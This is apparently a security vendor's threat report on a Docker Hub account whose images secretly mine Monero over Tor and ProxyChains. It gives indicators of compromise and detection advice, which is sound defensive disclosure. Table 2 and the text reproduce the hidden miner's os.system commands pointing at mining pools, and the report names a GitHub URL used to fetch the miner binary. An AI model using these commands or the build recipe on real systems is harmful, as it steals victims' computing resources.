This post is also available in: 日本語 (Japanese)
Docker containers have been gaining popularity over the past few years as an effective way of packaging software applications. Docker Hub provides a strong community-based model for users and companies to share their software applications. This is also attracting the attention of malicious actors intending to make money by cryptojacking within Docker containers and using Docker Hub to distribute these images.
We identified a malicious Docker Hub account, azurenql, active since October 2019 that was hosting six malicious images intended to mine the cryptocurrency, Monero. The coin mining code within the image intends to evade network detection by using network anonymizing tools such as ProxyChains and Tor. The images hosted on this account have been collectively pulled more than two million times. For context, there are legitimate Azure related images under the official Microsoft Docker Hub account that have anywhere from a few thousand to 100 million+ pulls. One of the wallet IDs identified has been used to earn more than 525.38 XMR, which roughly translates to $36,000 USD. Additionally, when we last checked minexmr.com for this wallet ID, we saw recent activity indicating that it’s still being used.
We would like to give a shout out to the awesome security team at Docker Hub. They were very responsive and were able to take down this malicious Docker Hub account quickly in response to our notification.
Palo Alto Networks customers are protected by this threat through Threat Prevention signatures on the Next-Generation Firewall. Prisma Cloud customers are protected by this through the Trusted Images feature.
We have identified a Docker Hub community user account named azurenql that contained eight repositories hosting six malicious Monero mining images. Here is a screenshot of the account and its repositories.
Table 1, below, provides a summary of all the images found under this Docker Hub account, listed in descending order of their pull counts. It is worth noting that the top image was pulled more than 1.47 million times.
|Image Name||Repo Digest||Image ID||Last Updated||Size
Table 1. Summary of images found on the Docker Hub account
Docker Image Structure
To understand how the image is built, we reviewed the image structure of the image azurenql /227_135:442. The image is built in the following sequence of steps:
- Use Ubuntu 16.04.6 LTS as the “base image”.
- Install dependencies required for building from source, such as gcc, make, python, etc.
- Install Tor to anonymize traffic. It is configured to listen on its default port, 9050.
- Copy the source of ProxyChains-NG and build from source. The ProxyChains config is left as default to route its traffic through the local Tor SOCKS proxy connection.
# defaults set to "tor"
socks4 127.0.0.1 9050
- Copy the source of the mining software, XMRig, and build from source.
- Copy a custom python script dao.py and set it as the image’s Entrypoint.
Figure 2, below, demonstrates this sequence.
Custom Script dao.py Analysis
The author of these images has included a custom Python script called dao.py, which is responsible for starting the mining process within the container, and was included in all the images.
As mentioned earlier, this script is registered as the Entrypoint in the image so that as soon as the image is started, this script will run.
All the Docker images mentioned in Table 1 contain some variant of this dao.py script. The only difference between the dao.py scripts in these images is that they use a different XMRig command line invocation. The different XMRig command line invocations are listed in Table 2.
High-level execution flow of the dao.py script:
- Find the number of CPU cores on the system.
- Set hugepages system property to increase the hash rate.
- Install Tor and build dependencies.
- If proxychains-ng is not already installed, install it from https://github.com/rofl0r/proxychains-ng.git
- If XMRig binary (“dlls”) is not present in /usr/local/bin, download it from https://github.com/nguyennhatduy2608/azures/raw/master/
- Symlink the XMRig binary (“dlls”) under /usr/local/bin and /usr/bin
- Start Tor in the background.
- Launch the miner through proxychains, which in turn routes the miner traffic through the local Tor SOCKS proxy as described earlier. A list of all the different mining commands used across the different dao.py versions is included in Table 2.
The script’s execution workflow is also demonstrated in Figure 5 below.
|Image_Name||Dao.py hash||Crypto command|
|azurenql/234_122:442||3a04405e83..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://188.8.131.52:442 --tls -t ' + str(cores))|
|azurenql/227_135:442||937d59ca35..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://184.108.40.206:442 --tls -t ' + str(cores))|
|azurenql/227_135_tor:442||b7e07fc8ea..||os.system ('proxychains4 ' + program + ' --donate-level 1 -o stratum+tcp://5pwcq42aa42fjzel.onion:442 --tls -t ' + str(cores))|
|azurenql/227_135_app:442||de518f1690..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://220.127.116.11:442 --tls -t ' + str(cores))|
|azurenql/93_164:442||81496a54fe..||os.system ('proxychains4 ' + program + ' --donate-level 1 -o stratum+tcp://18.104.22.168:442 --tls -t ' + str(cores))|
|azurenql/53_57:442||5d1cb23f8f..||os.system ('proxychains4 ' + program + ' -o stratum+tcp://22.214.171.124:442 --tls -t ' + str(cores))|
Table 2. Different mining commands used in the dao.py scripts
Cryptomining is about solving a complex computational problem, which allows users to chain together blocks of transactions. These images are utilizing the processing power of the victim systems to verify transactions. Here, the image author is using two methods to mine the blocks by running these malicious images in the user's environment.
In the first method, the attacker is directly submitting the mined blocks to the central minexmr pool using a wallet ID.
os.system ('xmrig --av=7 --variant 1 --donate-level=0 -o
When we looked up the transaction summary on the Monero mining pool, minexmr.com for this wallet ID, we saw recent activity indicating that the wallet ID is still used.
Figure 6 below shows the mining activity for this wallet in April and May 2020.
Figure 7 below indicates that this wallet ID has already earned 525.38 XMR, which roughly translates to $36,000 USD.
Whereas in the second method, the author has instances deployed on a hosting service running their own mining pool that are used to collect mined blocks.
The “Crypto Command” column in Table 2 lists examples of this method.
os.system ('proxychains4 ' + program + ' --donate-level 1 -o
stratum+tcp://126.96.36.199:442 --tls -t ' + str(cores))
Docker containers provide a convenient way for packaging software, which is evident by its increasing adoption rate. This combined with coin mining makes it easy for a malicious actor to distribute their images to any machine that supports Docker and instantly start using its compute resources towards cryptojacking.
Palo Alto Networks Next-Generation Firewall customers subscribed for Threat Prevention are protected by this threat. Palo Alto Networks has released a Threat Signature to prevent network based delivery of the malicious images identified in this blog. Details of this signature are:
|85887||Coin Mining Docker image Detection|
Table 3. Signature description for NGFW coverage
In addition, security best practices are recommended such as:
- Avoid pulling or using base images from untrusted repositories.
- Install the latest apps and threat definitions on the Palo Alto Networks Next-Generation Firewall.
- Palo Alto Networks Prisma Cloud can be used to secure cloud deployments.
Indicators of Compromise
|Image Name||Repo Digest||Image ID|
Wallet ID 43ZBkWEBNvSYQDsEMMCktSFHrQZTDwwyZfPp43FQknuy4UD3qhozWMtM4kKRyrr2Nk66JEiTypfvPbkFd5fGXbA1LxwhFZf
dao.py script hashes
Docker Hub account